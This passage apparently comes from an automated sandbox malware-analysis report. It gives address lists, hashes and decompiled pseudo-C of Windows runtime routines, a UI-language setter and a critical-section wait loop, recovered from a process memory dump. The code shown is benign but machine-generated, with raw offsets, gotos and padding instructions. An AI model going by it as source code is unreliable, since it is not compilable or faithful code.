              0x04bebad0
              0x04bebad1
              0x04bebadc
              0x04bebadc
              0x04beb980
              0x04beb980
              0x04beb988
              0x04beb98b
              0x04beb98d
              0x04beb990
              0x04beb993
              0x04beb999
              0x04beb99b
              0x04beb9a1
              0x04beb9a5
              0x04beb9aa
              0x04beb9b0
              0x04beb9bb
              0x04beb9c0
              0x04beb9c3
              0x04beb9ca
              0x04beb9cc
              0x04beb9cf
              0x04beb9d3
              0x04beb9d7
              0x04beba94
              0x04beba94
              0x04beba98
              0x04bebaa3
              0x04c32ccb
              0x04bebaa9
              0x04bebaa9
              0x04bebaa9
              0x04bebab1
              0x04c32cd5
              0x04c32cdd
              0x04c32cdd
              0x04bebabb
              0x04bebabc
              0x04bebac2
              0x04bebac3
              0x04bebac3
              0x04bebac6
              0x00000000
              0x04beb9dd
              0x04beb9dd
              0x04beb9e7
              0x04beb9e7
              0x04beb9ec
              0x04beb9ec
              0x04beb9f1
              0x04beb9f5
              0x04beb9fa
              0x04beba00
              0x04beba0c
              0x04beba10
              0x04beba10
              0x04beba12
              0x04beba18
              0x00000000
              0x00000000
              0x04bebb26
              0x04bebb26
              0x04beba1e
              0x04beba1e
              0x04beba23
              0x04beba25
              0x04beba2c
              0x04beba30
              0x04beba35
              0x04beba35
              0x04beba41
              0x04beba46
              0x04beba4c
              0x04beba50
              0x04beba54
              0x04beba6a
              0x04beba6e
              0x04beba70
              0x04beba74
              0x04beba78
              0x04beba7a
              0x04beba7c
              0x04beba8e
              0x04beba90
              0x04beba92
              0x04bebb14
              0x04bebb14
              0x04bebb16
              0x04bebb16
              0x00000000
              0x04beba7c
              0x04bebb0a
              0x04bebb0d
              0x00000000
              0x00000000
              0x00000000
              0x04bebb0f

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BEB9A5
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID:
              • API String ID: 885266447-0
              • Opcode ID: dca0dea249227b8afcb2ad07960c65fdb9c49a6de1acd5ad1fffe117220dc662
              • Instruction ID: 7b5f471a7d1823d45ab0d2062405acd1bcbbb64f0a18b39f9e8a8509126b7fec
              • Opcode Fuzzy Hash: dca0dea249227b8afcb2ad07960c65fdb9c49a6de1acd5ad1fffe117220dc662
              • Instruction Fuzzy Hash: 09514971608340CFCB20DF2AC080A2ABBE5FBC8614F1489AEE59597355EB30F945DB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E04BFFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04BDEEF0(0x4cb7b60);
					_t134 =  *0x4cb7b84; // 0x77497b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4cb7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4cb7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04BD6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04BD76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04C68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04BCB150();
													}
													_t116 = E04C66D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04BD75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4cb8638; // 0x310f1b0
																	_t122 = L04BD38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04BD76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04BD76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04BFFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04BD70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04BFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04BFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04BFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04BFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04BFFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4cb7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4cb7b84 = _t75;
						_t73 = E04BDEB70(_t134, 0x4cb7b60);
						if( *0x4cb7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04BDFF60( *0x4cb7b20);
							}
						}
						goto L5;
					}
				}
			}

















































              0x04bffab0
              0x04bffab2
              0x04bffab3
              0x04bffab4
              0x04bffabc
              0x04bffac0
              0x04bffb14
              0x04bffb17
              0x04bffac2
              0x04bffac8
              0x04bffacd
              0x04bffad3
              0x04bffad3
              0x04bffadd
              0x04bffb18
              0x04bffb1b
              0x04bffb1d
              0x04bffb1e
              0x04bffb1f
              0x04bffb20
              0x04bffb21
              0x04bffb22
              0x04bffb23
              0x04bffb24
              0x04bffb25
              0x04bffb26
              0x04bffb27
              0x04bffb28
              0x04bffb29
              0x04bffb2a
              0x04bffb2b
              0x04bffb2c
              0x04bffb2d
              0x04bffb2e
              0x04bffb2f
              0x04bffb3a
              0x04bffb3b
              0x04bffb3e
              0x04bffb41
              0x04bffb44
              0x04bffb47
              0x04bffb4a
              0x04bffb4d
              0x04bffb53
              0x04c3bdcb
              0x04c3bdcb
              0x04bffb59
              0x04bffb5b
              0x04bffb5b
              0x04bffb5e
              0x04c3bdd5
              0x04c3bdd8
              0x00000000
              0x04c3bdda
              0x00000000
              0x04c3bdda
              0x04bffb64
              0x04bffb64
              0x04bffb64
              0x04bffb67
              0x04bffb6e
              0x04bffb70
              0x04bffb72
              0x00000000
              0x04bffb78
              0x04bffb7a
              0x04bffb7a
              0x04bffb7d
              0x04bffb80
              0x04c3bddf
              0x04c3bde1
              0x00000000
              0x04c3bde3
              0x00000000
              0x04c3bde3
              0x04bffb86
              0x04bffb86
              0x04bffb86
              0x04bffb8b
              0x04bffb90
              0x04bffb92
              0x04bffb94
              0x04bffb9a
              0x04bffb9b
              0x04bffba1
              0x04c3bde8
              0x04c3bdeb
              0x04c3bded
              0x04c3beb5
              0x04c3beb5
              0x04c3bebb
              0x04c3bebd
              0x04c3bec3
              0x04c3bed2
              0x04c3bedd
              0x04c3bedd
              0x04c3beed
              0x00000000
              0x04c3bdf3
              0x04c3bdfe
              0x04c3be06
              0x04c3be0b
              0x04c3be0d
              0x04c3be0f
              0x04c3be14
              0x04c3be19
              0x04c3be20
              0x04c3be25
              0x04c3be27
              0x04c3be35
              0x04c3be39
              0x04c3be46
              0x04c3be4f
              0x04c3be54
              0x04c3be56
              0x04c3bef8
              0x04c3bef8
              0x00000000
              0x04c3be5c
              0x04c3be5c
              0x04c3be60
              0x00000000
              0x04c3be66
              0x04c3be66
              0x04c3be7f
              0x04c3be84
              0x04c3be87
              0x04c3be89
              0x04c3be8b
              0x04c3be99
              0x04c3be9d
              0x04c3bea0
              0x04c3beac
              0x04c3beaf
              0x04c3beb1
              0x04c3beb3
              0x04c3beb3
              0x00000000
              0x04c3bea2
              0x04c3bea2
              0x00000000
              0x04c3bea2
              0x04c3be8d
              0x04c3be8d
              0x04c3be92
              0x00000000
              0x04c3be92
              0x04c3be8b
              0x04c3be60
              0x04c3be3b
              0x04c3be3b
              0x04c3be3e
              0x00000000
              0x04c3be40
              0x04c3be40
              0x04c3be44
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04c3be44
              0x04c3be3e
              0x04c3be29
              0x04c3be29
              0x00000000
              0x04c3be29
              0x04c3be27
              0x00000000
              0x04bffba7
              0x04bffba7
              0x04bffbab
              0x04c3bf02
              0x04bffbb1
              0x04bffbb1
              0x04bffbb8
              0x04bffbbd
              0x04bffbbd
              0x04bffbbf
              0x04bffbbf
              0x04bffbc5
              0x04bffbcb
              0x04bffbf8
              0x04bffbf8
              0x04bffbfa
              0x00000000
              0x04bffc00
              0x04bffc00
              0x04bffc03
              0x00000000
              0x04bffc09
              0x04bffc09
              0x04bffc0f
              0x04bffc15
              0x04bffc23
              0x04bffc23
              0x04bffc25
              0x04bffc27
              0x04bffc75
              0x04bffc7c
              0x04bffc84
              0x00000000
              0x04bffc29
              0x04bffc29
              0x04bffc2d
              0x04bffc30
              0x04c3bf0f
              0x00000000
              0x04bffc36
              0x04bffc38
              0x04bffc3b
              0x04bffc41
              0x04c3bf17
              0x04c3bf19
              0x04c3bf48
              0x04c3bf4b
              0x00000000
              0x04c3bf1b
              0x04c3bf22
              0x04c3bf24
              0x04c3bf26
              0x00000000
              0x04c3bf2c
              0x04c3bf37
              0x04c3bf39
              0x04c3bf3b
              0x00000000
              0x04c3bf41
              0x04c3bf41
              0x04c3bf41
              0x04c3bf41
              0x04c3bf45
              0x00000000
              0x04c3bf45
              0x04c3bf3b
              0x04c3bf26
              0x00000000
              0x04bffc47
              0x04bffc47
              0x04bffc49
              0x04bffcb2
              0x04bffcb4
              0x04bffcb6
              0x04bffcdc
              0x04bffcdc
              0x00000000
              0x04bffcb8
              0x04bffcc3
              0x04bffcc5
              0x04bffcc7
              0x00000000
              0x04bffcc9
              0x04bffcc9
              0x04bffccd
              0x00000000
              0x04bffccd
              0x04bffcc7
              0x00000000
              0x04bffc4b
              0x04bffc4b
              0x04bffc4e
              0x04bffc4e
              0x04bffc51
              0x04bffc51
              0x04bffc54
              0x04bffc5a
              0x04bffc5c
              0x04bffc5f
              0x04bffc61
              0x04bffc63
              0x04bffc65
              0x04bffc67
              0x04bffc6e
              0x04bffc72
              0x04bffc72
              0x04bffc72
              0x04bffc72
              0x04bffc67
              0x04bffc61
              0x00000000
              0x04bffc5a
              0x04bffc49
              0x04bffc41
              0x04bffc30
              0x04bffc27
              0x04bffc03
              0x04bffbcd
              0x04bffbd3
              0x04bffbd9
              0x04bffbdc
              0x04bffbde
              0x04bffc99
              0x04bffc9b
              0x04bffc9d
              0x04bffcd5
              0x04bffcd5
              0x04bffc89
              0x04bffc89
              0x00000000
              0x04bffc9f
              0x04bffc9f
              0x04bffca3
              0x00000000
              0x04bffca3
              0x00000000
              0x04bffbe4
              0x04bffbe4
              0x04bffbe4
              0x04bffbe4
              0x04bffbe9
              0x04bffbf2
              0x00000000
              0x04bffbf2
              0x04bffbde
              0x04bffbcb
              0x04bffbab
              0x04bffc8b
              0x04bffc8b
              0x04bffc8c
              0x04bffb80
              0x04bffb72
              0x04bffb5e
              0x04bffc8d
              0x04bffc91
              0x04bffadf
              0x04bffadf
              0x04bffae1
              0x04bffae4
              0x04bffae7
              0x04bffaec
              0x04bffaf8
              0x04bffb00
              0x04bffb07
              0x04bffb0f
              0x04bffb0f
              0x04bffb07
              0x00000000
              0x04bffaf8
              0x04bffadd

              Strings
              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04C3BE0F
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
              • API String ID: 0-865735534
              • Opcode ID: 0d61ea505be969ad849e591af6ab7b3701f5a290a3dfdc40d10e20fde52aabeb
              • Instruction ID: 34fd94ffd8434226f0d212692fb83c6b5283b3714e6412f26ce945cc679b5f90
              • Opcode Fuzzy Hash: 0d61ea505be969ad849e591af6ab7b3701f5a290a3dfdc40d10e20fde52aabeb
              • Instruction Fuzzy Hash: E0A12731B006159FEB25DF68C8507BAB3A5EF48715F0445AAEA0ADB691FB30FD45CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
              Download Yara Rule
              C-Code - Quality: 63%
              			E04BC2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4cb5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4cb7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04C097C0();
				}
				if( *0x4cb79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4cb79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04BF1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04BE7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04C5FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04C09520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04BFE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04C1DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4cb6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4cb6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04C09980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04C095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04BE7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04BE7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04C47016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04C5FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4cb5350;
							if(_t109 != 0x4cb5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04C5FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04C55720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































              0x04bc2d8a
              0x04bc2d8a
              0x04bc2d92
              0x04bc2d96
              0x04bc2d9e
              0x04bc2da0
              0x04bc2da3
              0x04bc2da5
              0x04bc2da8
              0x04bc2dab
              0x04bc2db2
              0x04c1f9aa
              0x04c1f9ab
              0x04c1f9ae
              0x04c1f9ae
              0x04bc2db8
              0x04bc2dc2
              0x04c1f9b9
              0x04c1f9be
              0x04c1f9bf
              0x04c1f9bf
              0x04bc2dcf
              0x04c1f9c9
              0x04bc2dd5
              0x04bc2dd5
              0x04bc2dd5
              0x04bc2dde
              0x04bc2de1
              0x04bc2e70
              0x04bc2e72
              0x04bc2e72
              0x04bc2de7
              0x04bc2deb
              0x04bc2e7c
              0x04bc2e83
              0x04bc2e85
              0x04bc2e8b
              0x04bc2e8d
              0x04bc2e92
              0x04bc2e92
              0x04bc2e85
              0x04bc2df1
              0x04bc2df7
              0x04bc2df9
              0x04bc2df9
              0x04bc2dfc
              0x04bc2dff
              0x04bc2e02
              0x00000000
              0x04bc2e05
              0x04bc2e0c
              0x04c1f9d9
              0x04bc2e12
              0x04bc2e12
              0x04bc2e12
              0x04bc2e1a
              0x04c1f9e3
              0x04c1f9e9
              0x04c1f9f0
              0x04c1f9f6
              0x04c1f9f8
              0x04c1f9f8
              0x04c1f9f0
              0x04bc2e23
              0x04c1fa02
              0x04c1fa03
              0x04c1fa05
              0x04c1fa06
              0x00000000
              0x04bc2e29
              0x04bc2e29
              0x04bc2e2e
              0x04bc2e34
              0x04bc2e3e
              0x00000000
              0x00000000
              0x04bc2e44
              0x04bc2e47
              0x04bc2e4d
              0x00000000
              0x00000000
              0x04bc2e4f
              0x04bc2e54
              0x00000000
              0x00000000
              0x04bc2e5a
              0x04bc2e5f
              0x04bc2e9a
              0x04bc2ea4
              0x04bc2ea5
              0x04bc2ea8
              0x04bc2eaf
              0x04bc2eb2
              0x04bc2eb5
              0x04c1fae9
              0x04c1faeb
              0x04c1faed
              0x04c1faef
              0x04c1faf7
              0x04c1faf8
              0x04c1fafd
              0x04c1faff
              0x04c1fb04
              0x04c1fb04
              0x04c1faff
              0x04bc2ec0
              0x04bc2ec4
              0x04bc2ec6
              0x04bc2ec8
              0x04c1fb14
              0x04c1fb18
              0x04c1fb1e
              0x04c1fb21
              0x04c1fb21
              0x04bc2ece
              0x04bc2ece
              0x04bc2ece
              0x04bc2ed7
              0x04bc2e61
              0x04bc2e63
              0x04c1fa6b
              0x04c1fa71
              0x04c1fa76
              0x04c1fa78
              0x04c1fa8a
              0x04c1fa7a
              0x04c1fa83
              0x04c1fa83
              0x04c1fa8f
              0x04c1fa91
              0x04c1fa97
              0x04c1fa9d
              0x04c1faa4
              0x04c1faaa
              0x04c1faaf
              0x04c1fab1
              0x04c1fac3
              0x04c1fab3
              0x04c1fabc
              0x04c1fabc
              0x04c1fac8
              0x04c1facb
              0x04c1fadf
              0x04c1fadf
              0x04c1facb
              0x04c1faa4
              0x04c1fa91
              0x04bc2e6f
              0x04bc2e6f
              0x04bc2e5f
              0x04c1fa13
              0x04c1fa15
              0x04c1fa17
              0x04c1fa1f
              0x04c1fa21
              0x04c1fa22
              0x04c1fa25
              0x04c1fa28
              0x04c1fa2f
              0x04c1fa2f
              0x04c1fa2a
              0x04c1fa2a
              0x04c1fa2a
              0x04c1fa31
              0x04c1fa34
              0x04c1fa36
              0x04c1fa3c
              0x04c1fa3e
              0x04c1fa41
              0x04c1fa43
              0x04c1fa45
              0x04c1fa45
              0x04c1fa41
              0x04c1fa3c
              0x04c1fa4a
              0x04c1fa4f
              0x04c1fa51
              0x04c1fa53
              0x04c1fa56
              0x04c1fa5b
              0x04c1fa5e
              0x00000000
              0x04c1fa5e
              0x04bc2e23

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Re-Waiting
              • API String ID: 0-316354757
              • Opcode ID: 51cc6620afb8eed454e975985887e1197aec5d3cff1e2ab98f8b1decf4781b2a
